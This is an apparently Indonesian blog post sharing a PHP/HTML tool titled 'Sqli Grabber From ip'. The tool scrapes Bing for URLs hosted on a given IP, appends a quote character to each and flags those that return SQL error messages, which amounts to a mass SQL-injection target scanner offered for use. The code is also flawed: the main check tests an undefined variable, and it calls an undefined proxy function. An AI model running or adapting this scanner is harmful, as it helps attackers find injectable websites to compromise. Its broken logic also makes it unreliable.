Flash Go

Sqli Grabber From ip

Sqli Grabber From ip - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul Sqli Grabber From ip, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Tools, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Sqli Grabber From ip
link : Sqli Grabber From ip

Baca juga


Sqli Grabber From ip


# Title : Sqli Grabber From ip
# Coded by : Mr.Magnom
# Type : Php, html


<title>Bing Grabber from Ip</title>
<center>

<br />
<font color='yellow'>Coded by Mr MaGnoM</font><br> <br>
<a href="https://www.facebook.com/mr.magnom2/">
<img src="https://cdn3.iconfinder.com/data/icons/leaf/256/facebook.png" alt="contact me on facebook" width="30" height="30" />
</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<a href="http://magsec.blogspot.com/">
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/31/Blogger.svg/2000px-Blogger.svg.png" alt="visit my blog" width="30" height="30" />
</a><br>
<font face='Tahoma' size='4' color='#FF0000'>SQLi Scanner from ip priv8</font><br />
<form method="post">
<center>
<br/><input type="text" name="site" size="42" />
<br><input type="submit" name="go" value="Dont kill me i have a cat" />
</center>
</form>
<style type="text/css">
body{
background-color: #0A0000;
}
a{
text-decoration: none;
}

input{
color: #FF0000;
border: dotted 1pt #0078AA;
//*height: */
}
</style>

<?php
//<>

// functions

// coded by mr magnom


function getsource($url, $proxy) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB5");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
if ($proxy) {
$proxy = explode(':', autoprox());
curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
}
$content = curl_exec($curl);
curl_close($curl);
return $content;
}

/////////////
error_reporting(0);
set_time_limit(0);
$ip=$_POST['site'];
if($_POST["go"]) {

$npage = 1;
$npages = 300;
$allLinks = array();
$lll = array();
while($npage <= $npages) {
$x = getsource("http://www.bing.com/search?q=ip%3A" . $ip . "+id%3D&first=" . $npage, $proxy);
if ($x) {
preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
$npage = $npage + 10;
if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
} else break;
}
//print_r($allLinks) ;
$col=array_filter($allLinks);
$lol=array_unique($col);

foreach ($lol as $urll){
//echo'<b><font color="06FD02"><a href='.$urll.'>'.$urll.'</a></font></b><br>';
sqli($urll);
}


}
function sqli($url){
$url2=("$url%27");
$xx=http_get($url2);
if(preg_match("/SQL syntax/i",$x) or eregi('You have an error',$xx) or eregi(' in your SQL syntax',$x)or preg_match('/sql/i',$x)){
echo'<b><font color="green">'.$url2.'</font></b><br>';
}else{
echo'<b><font color="red">'.$url2.'</font></b><br>';
}
}
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}


?>


Demikianlah Artikel Sqli Grabber From ip

Sekianlah artikel Sqli Grabber From ip kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Sqli Grabber From ip dengan alamat link https://minatoet.blogspot.com/2015/12/sqli-grabber-from-ip.html

0 Response to "Sqli Grabber From ip"

Post a Comment